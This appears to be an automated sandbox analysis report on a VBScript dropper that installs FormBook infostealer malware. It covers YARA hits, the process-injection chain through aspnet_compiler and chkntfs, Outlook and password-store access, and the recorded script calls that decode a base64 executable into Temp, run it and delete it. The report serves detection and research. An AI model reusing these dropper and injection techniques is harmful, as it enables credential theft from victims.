            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/google_workspace.png
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/icon/101domain.ico
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/park-back.jpg
            Source: JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/park-back.webp
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/trustpilot.svg
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/js/jquery-3.6.0.min.js?20241209054434
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/js/modernizr-webp.js?20241209054434
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/js/pricing.js?20241209054434
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_source
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/country_domain.htm?utm_campaign=parked-page&utm_medium=referral&utm_source
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referra
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_s
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain_concierge_service.htm?query=waytoocool.life&utm_campaign=parked-pag
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htm
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/external_links.htm
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/gmail_email_aliases.htm
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sour
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_s
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/resource_center.htm
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=wa
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.financestrategists.com/founder-spotlight/best-corporate-domain-registrar-independent-101

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3304435992.0000000002710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3304393430.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3304322824.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            .NET source code contains very large array initializations
            Source: x.exe.0.dr, -Module-.csLarge array initialization: _003CModule_003E: array initializer size 73616
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: PO1341489LTB GROUP.vbsInitial sample: Strings found which are bigger than 50
            Source: x.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@9/3@8/6
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.logJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: chkntfs.exe, 00000006.00000002.3303352157.0000000002734000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3303352157.0000000002711000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2518800826.0000000002706000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3303352157.0000000002706000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2518598190.00000000026E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO1341489LTB GROUP.vbsVirustotal: Detection: 26%
            Source: PO1341489LTB GROUP.vbsReversingLabs: Detection: 21%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ifsutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: chkntfs.pdbGCTL source: aspnet_compiler.exe, 00000003.00000002.2338526683.0000000001417000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000003.2277403116.00000000008A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JogKDBeJAc.exe, 00000005.00000002.3304097784.0000000000F9E000.00000002.00000001.01000000.00000009.sdmp, JogKDBeJAc.exe, 00000007.00000002.3303611302.0000000000F9E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.2338810334.0000000001870000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.000000000465E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2338493197.0000000004169000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2341050723.0000000004314000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, 00000003.00000002.2338810334.0000000001870000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.000000000465E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2338493197.0000000004169000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2341050723.0000000004314000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: aspnet_compiler.pdb source: chkntfs.exe, 00000006.00000002.3305493710.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3303352157.0000000002688000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000000.2407341039.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.000000001578C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: aspnet_compiler.exe, 00000003.00000002.2338526683.0000000001417000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000003.2277403116.00000000008A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: BNXCNJ22333.pdb source: wscript.exe, 00000000.00000003.2078207053.000001B7B4DE4000.00000004.00000020.00020000.00000000.sdmp, x.exe.0.dr

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe", "1", "true");ISWbemServicesEx.ExecQuery("Select * from Win32_BIOS");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IXMLDOMNode._00000029("text");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANtlBpcAAAAAAAAAAOAAIgALATAAABQFAAAIAAAAAAAArjM");_Stream.Type("1");_Stream.Open();IXMLDOMElement.nodeTypedValue();_Stream.Write("Unsupported parameter type 00002011");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "x.exe");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\x.exe", "2");_Stream.Close();IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\x.exe");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\x.exe", "1", "true");IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\x.exe")
            Source: x.exe.0.drStatic PE information: 0x970665DB [Sun Apr 17 03:28:27 2050 UTC]
            Source: x.exe.0.drStatic PE information: section name: .text entropy: 7.913576675327169
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
